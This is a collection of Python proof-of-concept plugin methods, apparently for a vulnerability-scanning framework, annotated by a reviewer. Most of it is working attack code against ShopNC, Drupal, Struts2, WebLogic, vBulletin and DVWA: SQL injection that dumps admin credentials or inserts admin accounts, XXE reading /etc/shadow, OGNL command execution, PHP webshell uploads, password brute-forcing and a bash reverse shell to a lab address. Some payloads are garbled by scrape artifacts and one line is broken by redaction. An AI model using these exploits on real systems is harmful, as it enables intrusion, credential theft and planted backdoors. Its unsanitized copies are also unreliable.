def _attack(self):
    """Attack mode for the ShopNC member_address SQL injection.

    Posts the injection payload to the inajax address endpoint and then
    reads the address page, where the injected concat(0x7e, ...) values
    are expected to surface as '~'-prefixed strings.

    Returns:
        Whatever self.parse_attack(result) returns; result carries an
        'AdminInfo' entry only when at least one '~...' match was found.
    """
    result = {}
    url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address')
    vul_url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address&inajax=1')
    # true_name[] is the injected parameter; the SELECTs read admin_name and
    # admin_password from shopnc_admin, each prefixed with 0x7e ('~').
    payload = "exp&true_name[]=1,1,1,concat(0x7e,(SELECT admin_name FROM shopnc_admin limit 0,1)),concat(0x7e,(SELECT admin_password FROM shopnc_admin limit 0,1)),1,1,1) -- a"
    values = list()
    values.append("form_submit=ok&id=&true_name[]=")
    values.append(payload)
    values.append("&city_id=36&area_id=41&area_info=%E5%8C%97%E4%BA%AC%09%E5%8C%97%E4%BA%AC%E5%B8%82%09%E6%9C%9D%E9%98%B3%E5%8C%BA&address=wrwr&tel_phone=rwrwer&mob_phone=12312344123")
    post_data = "".join(values)
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    # Side effect on the target: this stores an address record containing
    # the injected values (the response of the POST is not inspected).
    req.post(vul_url, data=post_data, headers=headers)
    res = req.get(url)
    if res.status_code == 200:
        match_result = re.findall(r'~\w*', res.content, re.I | re.M)
        if match_result:
            result['AdminInfo'] = {}
            result['AdminInfo']['Username'] = match_result[0][1:]
            # NOTE(review): only the first match is guarded by the `if`;
            # a single '~' hit makes match_result[1] raise IndexError.
            result['AdminInfo']['Password'] = match_result[1][1:]
    return self.parse_attack(result)
def _verify(self):
    """Verify mode for a privilege-escalation issue in the me/setBasic profile form.

    Prompts interactively for an e-mail and password, and (after a span that
    is redacted in this copy of the file) checks whether the logged-in
    session can reach the admin settings page.

    NOTE(review): the source text between getpass.getpass(...) and the
    `find_result != -1` test is redacted ('******'); the login POST and the
    definitions of find_result and admin_result are therefore not visible
    here, and the line as shown is not valid Python.

    Returns:
        self.parse_attack(result); result holds 'VerifyInfo' only when the
        admin link was found.
    """
    result = {}
    # Endpoint URLs
    vul_url = urlparse.urljoin(self.url, '/index.php?r=me/setBasic')
    logout_url = urlparse.urljoin(self.url, '/index.php?r=u/logout')
    login_url = urlparse.urljoin(self.url, '/index.php?r=u/login')
    admin_url = urlparse.urljoin(self.url, '/index.php?r=admin/setting/site')
    # Profile-update body; the UserInfo[IsAdmin] field is the one under test.
    payload = "UserInfo%5Bname%5D=dubuqingfeng&UserInfo%5Bbio%5D=test&UserInfo%5Bintroduction%5D=&UserInfo%5BIsAdmin%5D=0&yt0="
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    email = raw_input("Email: ")
    password = getpass.getpass('password:'******'<a href="/index.php?r=admin">后台管理</a>')
    if find_result != -1:
        # Reuse the cookies from the admin-page response
        cookies = admin_result.cookies
        # Send the POST request (its result is only printed, not checked)
        get_shell_result = req.post(admin_url, cookies=cookies, headers=headers)
        print cookies
        print get_shell_result.content
        print get_shell_result.cookies
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = vul_url
        result['VerifyInfo']['Postdata'] = payload
    return self.parse_attack(result)
def _verify(self):
    """Verify mode for a Struts2 OGNL injection via the Content-Type header.

    Builds an OGNL expression that runs `echo <marker>` on the target and
    copies the process output into the HTTP response; the marker string is
    then searched for in the body.

    NOTE(review): the token '[email protected]' inside the payload looks like an
    e-mail-obfuscation artifact of the page this was scraped from rather
    than the author's original text; treat this copy as non-authoritative.

    Returns:
        self.parse_output(result); result holds 'VerifyInfo' only when the
        marker is echoed back.
    """
    result = {}
    command = "echo 89aifh76ftq4fu38yfq498yf"
    payload = "Content-Type:%{(#_='multipart/form-data')."
    payload += "(#[email protected]@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?"
    payload += "(#_memberAccess=#dm):"
    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
    payload += "(#ognlUtil.getExcludedClasses().clear())."
    payload += "(#context.setMemberAccess(#dm))))."
    # The command is interpolated into the expression as a literal.
    payload += "(#cmd='%s')." % command
    payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
    payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
    payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
    payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
    payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
    payload += "(#ros.flush())}"
    # The whole expression is sent as the Content-Type header value.
    headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
    response = req.post(self.url, headers=headers)
    if "89aifh76ftq4fu38yfq498yf" in response.content:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = response.url
    return self.parse_output(result)
def _verify(self): result = {} #下面以尝试读取/etc/shadow为例子进行测试 filename = '/etc/shadow' payload=r'<?xml version="1.0" encoding="ISO-8859-1"?>'\ '<?xml version="1.0" encoding="ISO-8859-1"?>'\ '<!DOCTYPE foo ['\ '<!ELEMENT foo ANY >'\ '<!ENTITY xxe SYSTEM "file://{file}" >]>' \ '<Request>'\ '<Username>root</Username>'\ '<Password>root</Password>'\ '</Request>'.format(file=filename) expurl = '{url}/api/login'.format(url=self.url) try: response = req.post(expurl, data=payload, headers=self.headers, timeout=50) if re.match('root:.+?:0:0:.+?:.+?:.+?', response.content) and response.status_code == 200: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = expurl result['Fileinfo']['Filename'] = filename result['Fileinfo']['Content'] = response.content else: result = {} except: result = {} return self.parse_output(result)
def _attack(self):
    """Attack mode for the Drupal user-login SQL injection (stacked queries).

    After _verify(verify=False) succeeds, inserts a new users row with a
    random uid/name and a fixed password hash, plus a users_roles row with
    rid 3, by injecting through the name[] array key.

    Side effects on the target: two INSERTs into the users and users_roles
    tables; nothing here removes them afterwards.

    Returns:
        self.parse_attack(result); 'AdminInfo' is set on HTTP 200.
    """
    result = {}
    vul_url = '%s/?q=node&destination=node' % self.url
    # Random uid in [0, 1000) and a 5-character random username
    uid = int(random.random() * 1000)
    username = ''.join(random.sample(string.letters + string.digits, 5))
    payload = OrderedDict()
    if not self._verify(verify=False):
        return self.parse_attack(result)
    # The injected SQL lives in the dict *key*; '******' here is the
    # placeholder the author left for the cleartext of the hash above.
    payload['name[0;insert into users(uid, name, pass, status, data) values (%d, \'%s\', '
            '\'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld\', 1, \'{b:0;}\');'
            'insert into users_roles(uid, rid) values (%d, 3);#]' % (uid, username, uid)] = 'test'
    payload['name[0]'] = 'test2'
    payload['pass'] = '******'
    payload['form_id'] = 'user_login_block'
    response = req.post(vul_url, data=payload)
    # NOTE(review): a 200 does not prove the INSERTs ran; the login form
    # returns 200 on failure as well.
    if response.status_code == 200:
        result['AdminInfo'] = {}
        result['AdminInfo']['Username'] = username
        result['AdminInfo']['Password'] = '******'
    return self.parse_attack(result)
def _attack(self):
    """Attack mode: upload a PHP file as an image, then include it via the
    `d` parameter with a trailing %00.

    Side effects on the target: a file is written under uploadfiles/ and is
    not cleaned up. Falls back to self._verify() when check_argv() is false.

    Returns:
        self.parse_attack(result) when check_argv() passes, otherwise the
        value of self._verify().
    """
    if self.check_argv():
        result = {}
        # Hand-built multipart body with a fixed boundary
        self.headers['Content-Type'] = "multipart/form-data; boundary=----WebKitFormBoundaryMOKvckE0g6qr7jKz"
        post_data = "------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"files\"; filename=\"testjpg.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php var_dump(md5(123));@assert($_REQUEST['gump']);?>\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\n\r\n \r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picWidth\"\r\n\r\n142\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picHeight\"\r\n\r\n102\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"waterImg\"\r\n\r\n0\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz--\r\n\r\n"
        # Upload the file through the regular upload handler.
        # NOTE(review): self.headers is mutated but not passed to req.post
        # here, so whether the Content-Type reaches the target depends on
        # how `req` is wired up elsewhere.
        post_url = urlparse.urljoin(self.url, 'index.php?ac=common_upfile&type=')
        resp = req.post(url=post_url, data=post_data)
        # Extract the stored filename from the response
        if resp.status_code == 200:
            match_result = re.search(r'value =\'(.*?)\'', resp.content, re.I | re.M)
            if match_result:
                # Request the local-file-inclusion URL
                payload = "../../uploadfiles/" + match_result.group(1) + "%00"
                vul_url = urlparse.urljoin(self.url, "index.php?d=" + payload)
                resp = req.get(vul_url)
                # md5(123) == 202cb962ac59075b964b07152d234b70 marks execution
                if resp.status_code == 200 and '202cb962ac59075b964b07152d234b70' in resp.content:
                    result['ShellInfo'] = {}
                    result['ShellInfo']['URL'] = vul_url
                    result['ShellInfo']['Content'] = "<?php var_dump(md5(123));@assert($_REQUEST['gump']);?>"
        return self.parse_attack(result)
    return self._verify()
def _attack(self):
    """Attack mode for the Drupal user-login SQL injection (stacked queries).

    Identical in behaviour to the other _attack variant in this listing:
    after _verify(verify=False) succeeds, inserts a users row (random
    uid/name, fixed password hash) and a users_roles row with rid 3 by
    injecting through the name[] array key.

    Side effects on the target: two INSERTs that are never reverted.

    Returns:
        self.parse_attack(result); 'AdminInfo' is set on HTTP 200.
    """
    result = {}
    vul_url = '%s/?q=node&destination=node' % self.url
    uid = int(random.random() * 1000)
    username = ''.join(random.sample(string.letters + string.digits, 5))
    payload = OrderedDict()
    if not self._verify(verify=False):
        return self.parse_attack(result)
    # The injected SQL is the dict key; name[0] and pass are filler fields.
    payload['name[0;insert into users(uid, name, pass, status, data) values (%d, \'%s\', '
            '\'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld\', 1, \'{b:0;}\');'
            'insert into users_roles(uid, rid) values (%d, 3);#]' % (uid, username, uid)] = 'test'
    payload['name[0]'] = 'test2'
    payload['pass'] = '******'
    payload['form_id'] = 'user_login_block'
    response = req.post(vul_url, data=payload)
    # NOTE(review): HTTP 200 alone does not confirm that the INSERTs ran.
    if response.status_code == 200:
        result['AdminInfo'] = {}
        result['AdminInfo']['Username'] = username
        result['AdminInfo']['Password'] = '******'
    return self.parse_attack(result)
def common(self):
    """Obtain a session id from /escform.esp.

    Posts a fixed login form and extracts the `sessionid` query value from
    the FRAME src in the response.

    Returns:
        The session id string when the FRAME tag is present; otherwise the
        re.search result itself (None), since the variable is reused.
    """
    payload = 'formid=1&login=ALARM'
    response = req.post(self.url + "/escform.esp", data=payload).content
    sessionid = re.search('<FRAME src="escmenu\.esp\?sessionid=(\d*)', response)
    if sessionid:
        # Replace the match object with the captured digits
        sessionid = sessionid.group(1)
    return sessionid
def _verify(self):
    """Verify mode: online password guessing against a DVWA-style login.php.

    For each candidate password, fetches login.php to obtain a fresh CSRF
    token and cookies, posts the credentials, and inspects the `.message`
    element. Each attempt is a separate login request against the target,
    which is the behaviour a rate limit or lockout would detect.

    Returns:
        self.parse_output(result); 'DBInfo' carries the working pair,
        'extra' reports a CSRF-token failure.
    """
    result = {}
    username = '******'  # login account (placeholder in this copy)
    pwdlist = getLargeWeakPassword()
    for pwd in pwdlist:
        htmlTXT = req.get(self.url + "/login.php")
        Content = pq(htmlTXT.text)
        tokenStr = Content("input")
        # NOTE(review): assumes the fourth <input> on the page is the token;
        # a different page layout makes this an IndexError or a wrong value.
        Token = tokenStr[3].value  # read the CSRF token
        _cookies = htmlTXT.cookies.get_dict()  # read the session cookies
        payload = {'username': username, 'password': pwd, 'user_token': Token, 'Login': '******'}
        response = req.post(self.url + "/login.php", data=payload, cookies=_cookies)
        rcontent = pq(response.text)
        reqMes = rcontent('.message').text()
        if reqMes == "Login failed":
            continue  # login failed: try the next password
        if reqMes == "CSRF token is incorrect":
            result['extra'] = {}
            result['extra']['error'] = 'user_token校验失败'
            return self.parse_output(result)  # CSRF check failed
        # Any other message is treated as success
        result['DBInfo'] = {}
        result['DBInfo']['Username'] = username
        result['DBInfo']['Password'] = pwd
        return self.parse_output(result)
def _verify(self):
    """Verify mode for the WebLogic /_async/AsyncResponseService issue.

    Sends both the Linux and the Windows template (self.payload_linux /
    self.payload_win, defined elsewhere on the class) with a base64-encoded
    `whoami` and treats HTTP 202 from either as confirmation.

    NOTE(review): this rewrites self.url in place to the /_async path, so
    any later call on the same instance sees the modified URL.

    Returns:
        self.parse_output(result); 'VerifyInfo' is set on a 202.
    """
    result = {}
    filename = "/_async/AsyncResponseService"
    self.url = self.url.strip('/') + filename
    headers = {'content-type': 'text/xml'}
    # 'd2hvYW1p' is base64 for 'whoami'; it is decoded and run on the target.
    cmd = 'echo d2hvYW1p|base64 -d|bash'
    data_linux = self.payload_linux.format(cmd)
    data_win = self.payload_win.format(cmd)
    r1 = req.post(self.url, data=data_linux, headers=headers, timeout=7)
    r2 = req.post(self.url, data=data_win, headers=headers, timeout=7)
    # NOTE(review): 202 is the service's normal accept code, so this check
    # shows the endpoint exists rather than that the command ran.
    if r1.status_code == 202 or r2.status_code == 202:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['url'] = self.url
    return self.parse_output(result)
def _verify(self):
    """Verify mode for DVWA command injection, with the security level
    forced to 'low' through the cookie.

    Logs in, confirms injection by echoing a random MD5 through the ping
    form, then issues a bash reverse-shell command to the hard-coded lab
    listener 192.168.1.55:8888 (baked into the payload, not taken from
    self.params). The original also carried two commented-out alternative
    shell variants, not reproduced here.

    Returns:
        self.parse_output(result); 'extra' is set only after the echo
        check succeeds.
    """
    result = {}
    username = '******'  # login account (placeholder in this copy)
    password = '******'  # login password (placeholder in this copy)
    htmlTXT = req.get(self.url + "/login.php")
    Content = pq(htmlTXT.text)
    tokenStr = Content("input")
    Token = tokenStr[3].value  # read the CSRF token (assumes 4th <input>)
    _cookies = htmlTXT.cookies.get_dict()  # read the session cookies
    # Force the DVWA security level to 'low'
    _cookies['security'] = 'low'
    payload = {'username': username, 'password': password, 'user_token': Token, 'Login': '******'}
    response = req.post(self.url + "/login.php", data=payload, cookies=_cookies)
    # Random MD5 used as an execution marker
    rand_num = random.randint(0, 1000)
    md5 = hashlib.md5()
    md5.update(str(rand_num))
    m = md5.hexdigest()
    # Check whether the command injection exists
    payload = {'ip': '127.0.0.1;echo "<p>' + str(m) + '</p><br/>"', 'Submit': 'Submit'}
    response = req.post(self.url + "/vulnerabilities/exec/index.php", data=payload, cookies=_cookies)
    htmlText = pq(response.text)
    tag = htmlText('pre p').html()
    if tag == str(m):
        # Reverse shell; a listener must already be running on the address
        # below. Variant 1: bash /dev/tcp shell.
        payload = {'ip': '127.0.0.1;bash -i >& /dev/tcp/192.168.1.55/8888 0>&1"', 'Submit': 'Submit'}
        response = req.post(self.url + "/vulnerabilities/exec/index.php", data=payload, cookies=_cookies)
        result['extra'] = {}
        result['extra']['Shell'] = "OK! Open 'NC -lvv 8888' "
    return self.parse_output(result)
def _verify(self):
    """Verify mode: a bare POST to self.url, flagged when the response body
    mentions 'information_schema' (an error-based SQL disclosure signature).

    The two-second sleep runs after the response has already been received,
    so it delays the check rather than the request.

    Returns:
        self.parse_output(result).
    """
    result = {}
    resp = req.post(self.url)
    time.sleep(2)
    if 'information_schema' in resp.content:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = self.url
    return self.parse_output(result)
def _verify(self):
    '''Verify mode for a Struts2 OGNL injection through the Content-type header.

    Writes the marker 'bey0nd' into the response via the servlet writer and
    checks for it in the body.

    NOTE(review): both '[email protected]' tokens in the payload look like
    e-mail-obfuscation artifacts of the page this was scraped from, not the
    author's original text; this copy is not authoritative. The header is
    set on self.headers, so it persists on the instance after this call.

    Returns:
        self.parse_output(result); 'FileInfo' is set when the marker is seen.
    '''
    result = {}
    self.headers['Content-type'] = "%{(#nikenb='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#o.println('bey0nd')).(#o.close())}"
    resp = req.post(self.url, headers=self.headers)
    if resp and resp.text and resp.status_code == 200:
        if "bey0nd" in resp.text:
            result['FileInfo'] = {}
            result['FileInfo']['Filename'] = "bey0nd"
    return self.parse_output(result)
def _verify(self):
    """Verify mode for the ShopNC member_address SQL injection.

    Stores an address whose true_name[] field injects md5(0x2333333), then
    reads the address page and looks for that hash.

    Side effect on the target: an address record is created and not removed.

    Returns:
        self.parse_attack(result); 'VerifyInfo' is set when the hash is found.
    """
    result = {}
    url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address')
    vul_url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address&inajax=1')
    payload = "exp&true_name[]=1,1,1,1,md5(0x2333333),1,1,1) -- a"
    values = list()
    values.append("form_submit=ok&id=&true_name[]=")
    values.append(payload)
    values.append("&city_id=36&area_id=41&area_info=%E5%8C%97%E4%BA%AC%09%E5%8C%97%E4%BA%AC%E5%B8%82%09%E6%9C%9D%E9%98%B3%E5%8C%BA&address=wrwr&tel_phone=rwrwer&mob_phone=12312344123")
    post_data = "".join(values)
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    req.post(vul_url, data=post_data, headers=headers)
    res = req.get(url)
    # 525c6bd8bbf951e6863256456f328265 is the expected md5(0x2333333) output
    if res.status_code == 200 and '525c6bd8bbf951e6863256456f328265' in res.content:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = vul_url
        result['VerifyInfo']['Payload'] = payload
    return self.parse_attack(result)
def _attack(self):
    """Attack mode: write a PHP shell through /admin/file_manager.php?action=save.

    Uses the PhpShell helper (defined elsewhere) with a generated password
    and a random six-letter filename, then checks the shell via the helper.

    Side effect on the target: a .php file is created in the web root and
    is not cleaned up.

    Returns:
        self.parse_output(result); 'ShellInfo' is set when webshell.check()
        succeeds.
    """
    result = {}
    vul_url = '/admin/file_manager.php'
    params = {'action': 'save'}
    webshell = PhpShell()
    webshell.set_pwd(genPassword(6))
    filename = ''.join([random.choice(string.ascii_lowercase) for _ in range(6)]) + '.php'
    content = webshell.get_content()
    data = {'filename': filename, 'file_contents': content, 'submit': ''}
    # The save response is not inspected; success is judged by check().
    req.post(self.url + vul_url, params=params, data=data)
    if webshell.check(self.url + ('/%s' % filename)):
        result['ShellInfo'] = {}
        result['ShellInfo']['URL'] = self.url + ('/%s' % filename)
        result['ShellInfo']['Content'] = content
    return self.parse_output(result)
def _attack(self):
    """Attack mode: post `action=get&resource=;id` to /res.php and hand the
    raw response body to parse_attack.

    NOTE(review): 'Connection-Type' is not a standard HTTP header name;
    it is sent as written. No status code is checked, so any non-empty
    body (including an error page) is passed through as a result.

    Returns:
        self.parse_attack(response.content), or self.parse_attack(False)
        when the body is empty.
    """
    head = {
        'Connection-Type': 'application/x-www-form-urlencoded',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    # %3B is ';', appended to the resource parameter
    payload = 'action=get&resource=%3Bid'
    response = req.post(self.url + '/res.php', data=payload, headers=head)
    if response.content:
        return self.parse_attack(response.content)
    else:
        return self.parse_attack(False)
def _verify(self):
    """Verify mode for an unrestricted upload in /maxImageUpload/index.php.

    Uploads a self-deleting PHP file declared as image/jpeg, then requests
    it under /maxImageUpload/original/ and looks for md5(0x2333333).

    NOTE(review): the `in resp` test is evaluated against the Response
    object, not resp.content, so whether it ever matches depends on how
    the Response type iterates; confirm before relying on this check.

    Returns:
        self.parse_output(result).
    """
    result = {}
    testurl = urlparse.urljoin(self.url, '/maxImageUpload/original/1.php')
    vulurl = urlparse.urljoin(self.url, '/maxImageUpload/index.php')
    payload = {
        'myfile': ('1.php', '<?php echo md5(0x2333333);unlink(__FILE__);?>', 'image/jpeg')
    }
    data = {'submitBtn': 'Upload'}
    # The upload response body is read and discarded.
    req.post(vulurl, files=payload, data=data).content
    resp = req.get(testurl)
    # 5a8adb32edd60e0cfb459cfb38093755 is the expected md5(0x2333333) output
    if '5a8adb32edd60e0cfb459cfb38093755' in resp:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = vulurl
        result['VerifyInfo']['Payload'] = payload
    return self.parse_output(result)
def _attack(self):
    """Attack mode for the ShopNC member_address SQL injection.

    Same behaviour as the other ShopNC _attack in this listing: stores an
    address whose true_name[] field injects two concat(0x7e, ...) SELECTs
    against shopnc_admin, then reads the '~'-prefixed values back from the
    address page.

    Side effect on the target: an address record is created and not removed.

    Returns:
        self.parse_attack(result); 'AdminInfo' is set when a '~' match exists.
    """
    result = {}
    url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address')
    vul_url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address&inajax=1')
    payload = "exp&true_name[]=1,1,1,concat(0x7e,(SELECT admin_name FROM shopnc_admin limit 0,1)),concat(0x7e,(SELECT admin_password FROM shopnc_admin limit 0,1)),1,1,1) -- a"
    values = list()
    values.append("form_submit=ok&id=&true_name[]=")
    values.append(payload)
    values.append("&city_id=36&area_id=41&area_info=%E5%8C%97%E4%BA%AC%09%E5%8C%97%E4%BA%AC%E5%B8%82%09%E6%9C%9D%E9%98%B3%E5%8C%BA&address=wrwr&tel_phone=rwrwer&mob_phone=12312344123")
    post_data = "".join(values)
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    req.post(vul_url, data=post_data, headers=headers)
    res = req.get(url)
    if res.status_code == 200:
        match_result = re.findall(r'~\w*', res.content, re.I | re.M)
        if match_result:
            result['AdminInfo'] = {}
            result['AdminInfo']['Username'] = match_result[0][1:]
            # NOTE(review): match_result[1] raises IndexError on a single match.
            result['AdminInfo']['Password'] = match_result[1][1:]
    return self.parse_attack(result)
def _attack(self):
    """Attack mode for the WebLogic /_async/AsyncResponseService issue.

    Sends the Linux and Windows templates (self.payload_linux /
    self.payload_win, defined elsewhere) carrying base64-encoded commands
    that, per the author's note, ping an out-of-band DNS-log subdomain;
    the result is then read back through self.verify_result() (also
    defined elsewhere). The callback domain is hard-coded inside the
    base64 strings.

    Returns:
        self.parse_output(result); 'extra' and 'VerifyInfo' are set when
        verify_result() returns something truthy.
    """
    result = {}
    filename = "/_async/AsyncResponseService"
    url = self.url.strip('/') + filename
    print(url)
    headers = {'content-type': 'text/xml'}
    # --ping `whoami`.weblogic.xxxxxx.ceye.io--  (author's description of the
    # decoded commands below)
    cmd_linux = 'echo cGluZyBgd2hvYW1pYC53ZWJsb2dpYy42ZmJwaWMuY2V5ZS5pbw==|base64 -d|bash'
    cmd_win = 'echo cGluZyBMTEwud2VibG9naWMuNmZicGljLmNleWUuaW8=|base64 -d|bash'
    data_liunx = self.payload_linux.format(cmd_linux)
    data_win = self.payload_win.format(cmd_win)
    r1 = req.post(url, data=data_liunx, headers=headers, timeout=7)
    r2 = req.post(url, data=data_win, headers=headers, timeout=7)
    if r1.status_code == 202 or r2.status_code == 202:
        whoami = self.verify_result()
        if whoami:
            result['extra'] = {}
            result['extra']['whoami'] = whoami
            result['VerifyInfo'] = {}
            result['VerifyInfo']['url'] = self.url
    return self.parse_output(result)
def _verify(self):
    """Verify mode for the ShopNC member_address SQL injection.

    Same behaviour as the other ShopNC _verify in this listing: stores an
    address whose true_name[] field injects md5(0x2333333), then looks for
    the hash on the address page.

    Side effect on the target: an address record is created and not removed.

    Returns:
        self.parse_attack(result); 'VerifyInfo' is set when the hash is found.
    """
    result = {}
    url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address')
    vul_url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address&inajax=1')
    payload = "exp&true_name[]=1,1,1,1,md5(0x2333333),1,1,1) -- a"
    values = list()
    values.append("form_submit=ok&id=&true_name[]=")
    values.append(payload)
    values.append("&city_id=36&area_id=41&area_info=%E5%8C%97%E4%BA%AC%09%E5%8C%97%E4%BA%AC%E5%B8%82%09%E6%9C%9D%E9%98%B3%E5%8C%BA&address=wrwr&tel_phone=rwrwer&mob_phone=12312344123")
    post_data = "".join(values)
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    req.post(vul_url, data=post_data, headers=headers)
    res = req.get(url)
    # 525c6bd8bbf951e6863256456f328265 is the expected md5(0x2333333) output
    if res.status_code == 200 and '525c6bd8bbf951e6863256456f328265' in res.content:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = vul_url
        result['VerifyInfo']['Payload'] = payload
    return self.parse_attack(result)
def _verify(self):
    """Verify mode: write a probe PHP file via /admin/file_manager.php?action=save.

    Uses the PhpVerify helper (defined elsewhere) and a random six-letter
    filename, then confirms through webshell.check().

    Side effect on the target: a .php file is created in the web root and
    is not cleaned up by this method.

    Returns:
        self.parse_output(result); 'VerifyInfo' is set when check() succeeds.
    """
    result = {}
    vul_url = '/admin/file_manager.php'
    params = {'action': 'save'}
    webshell = PhpVerify()
    filename = ''.join([random.choice(string.ascii_lowercase) for _ in range(6)]) + '.php'
    content = webshell.get_content()
    data = {'filename': filename, 'file_contents': content, 'submit': ''}
    response = req.post(self.url + vul_url, params=params, data=data)
    if webshell.check(self.url + ('/%s' % filename)):
        result['VerifyInfo'] = {}
        # response.url is the save endpoint, not the written file
        result['VerifyInfo']['URL'] = response.url
    return self.parse_output(result)
def _attack(self):
    '''
    Attack mode: writes 1.php (<?php eval($_POST["a"]);?>) into the web root
    through the vBulletin decodeArguments unserialize endpoint, then posts a
    marker to it to confirm execution.

    Side effect on the target: /1.php is created and is not removed.

    Returns:
        self.parse_attack(result); 'shellURL' is set when the marker
        (md5(0x2333)) comes back from 1.php.
    '''
    result = {}
    # URL-encoded serialized vB_dB_Result object; its recordset field holds
    # the file_put_contents call that writes 1.php.
    payload = "O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A18%3A%22vB_Database_MySQLi%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A55%3A%22file_put_contents%28%271.php%27%2C%27%3C%3Fphp+eval%28%24_POST%5B%22a%22%5D%29%3B%3F%3E%27%29%22%3B%7D"
    vulurl = urlparse.urljoin(self.url, "/ajax/api/hook/decodeArguments?arguments=%s" % payload)
    resp = req.get(vulurl)
    if resp.status_code == 200:
        verify_payload = {"a": "echo md5(0x2333);"}
        shell_url = urlparse.urljoin(self.url, '/1.php')
        resp1 = req.post(shell_url, data=verify_payload)
        # 840c3eda3ea42ecd90aeb3434f3510b7 is the expected md5(0x2333) output
        if resp1.status_code == 200 and "840c3eda3ea42ecd90aeb3434f3510b7" in resp1.content:
            result['shellURL'] = shell_url + " password: a"
            return self.parse_attack(result)
    return self.parse_attack(result)
def _verify(self):
    """Verify mode for an error-based SQL injection in celive/live/header.php.

    Injects a floor(rand(0)*2) duplicate-key expression through the
    xajaxargs[0][name] parameter so that md5(233) appears in the error text.

    Returns:
        self.parse_result(result); 'VerifyInfo' is set when the hash is seen.
    """
    result = {}
    target = self.url + '/celive/live/header.php'
    post_data = {
        'xajax': 'LiveMessage',
        'xajaxargs[0][name]': "1',(SELECT 1 FROM (select count(*),concat("
                              "floor(rand(0)*2),(select md5(233)))a from "
                              "information_schema.tables group by a)b),"
                              "'','','','1','127.0.0.1','2') #"
    }
    # Send the POST with requests
    response = req.post(target, data=post_data, timeout=10)
    content = response.content
    # e165421110ba03099a1c0393373c5b43 is md5(233)
    if 'e165421110ba03099a1c0393373c5b43' in content:
        result = {'VerifyInfo': {}}
        result['VerifyInfo']['URL'] = target
    return self.parse_result(result)
def _verify(self, verify=True):
    """Verify mode for the Drupal user-login SQL injection.

    Injects an error-based md5(715890248135) probe through the name[] array
    key and looks for the hash in the response.

    Args:
        verify: accepted for the _attack(..., verify=False) call site; it is
            not read anywhere in this body.

    Returns:
        self.parse_attack(result); 'VerifyInfo' is set when the hash is seen.
    """
    result = {}
    vul_url = '%s/?q=node&destination=node' % self.url
    payload = {
        'name[0 and (select 1 from (select count(*),concat((select md5(715890248'
        '135)),floor(rand(0)*2))x from information_schema.tables group by x'
        ')a);;#]': 'test',
        'name[0]': 'test2',
        'pass': '******',
        'form_id': 'user_login_block',
    }
    response = req.post(vul_url, data=payload).content
    # e4f5fd37a92eb41ba575c81bf0d31591 is the expected md5(715890248135) output
    if 'e4f5fd37a92eb41ba575c81bf0d31591' in response:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = self.url
        result['VerifyInfo']['Payload'] = urllib.urlencode(payload)
    return self.parse_attack(result)
def _verify(self):
    """Verify mode for the WebLogic /_async/AsyncResponseService issue.

    Fills self.payload1 (defined elsewhere on the class) with a random
    8-letter flag, posts it, and then fetches
    /bea_wls_internal/<flag>.jsp to see whether the flag was written.

    Side effect on the target: a JSP named after the flag is created under
